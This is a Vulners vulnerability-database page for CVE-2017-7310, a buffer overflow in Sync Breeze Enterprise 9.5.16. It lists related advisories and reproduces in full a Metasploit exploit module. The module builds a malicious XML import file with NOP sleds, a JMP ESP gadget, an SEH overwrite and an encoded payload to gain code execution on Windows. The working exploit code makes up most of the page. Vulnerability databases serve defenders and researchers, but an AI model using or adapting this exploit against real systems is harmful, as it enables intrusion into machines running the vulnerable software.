Vulners
Lucene search
Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow Exploit | 25 Jan 201800:00 | – | zdt |
| Disk Pulse Enterprise 10.4.18 - Import Command Buffer Overflow (SEH) Exploit | 21 Feb 201800:00 | – | zdt |
 | CVE-2017-7310 | 29 Mar 201700:00 | – | circl |
 | Buffer Overflow Vulnerability in Multiple Flexense Products | 31 Mar 201700:00 | – | cnvd |
 | CVE-2017-7310 | 29 Mar 201721:00 | – | cve |
 | CVE-2017-7310 | 29 Mar 201721:00 | – | cvelist |
 | Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH) | 21 Feb 201800:00 | – | exploitdb |
 | Disk Pulse Enterprise 10.4.18 - Import Command Buffer Overflow (SEH) | 21 Feb 201800:00 | – | exploitpack |
 | Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow | 24 Jan 201820:47 | – | metasploit |
| Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow | 15 Jan 201820:46 | – | metasploit |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow',
'Description' => %q(
This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16
by using the import command option to import a specially crafted xml file.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira'
],
'References' =>
[
[ 'CVE', '2017-7310' ],
[ 'EDB', '41773' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27",
'StackAdjustment' => -3500
},
'Targets' =>
[
['Windows Universal', { 'Ret' => 0x10015FFE } ]
],
'Privileged' => false,
'DisclosureDate' => 'Mar 29 2017',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
])
end
def exploit
jmpesp = "\x7A\xB7\x1B\x65" # JMP ESP QtGui4.dll
esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
jmp = "\xFF\xE0" # JMP ESP
buffer = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
buffer << "\x90" * 1536
buffer << jmpesp
buffer << "\x90" * 18
buffer << esp
buffer << jmp
buffer << "\x90" * 68
buffer << generate_seh_record(target.ret)
buffer << "\x90" * 10
buffer << payload.encoded
buffer << "\x90" * 5000
buffer << "\n</classify>"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(buffer)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jan 2018 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.8
CVSS 37.8
EPSS0.86559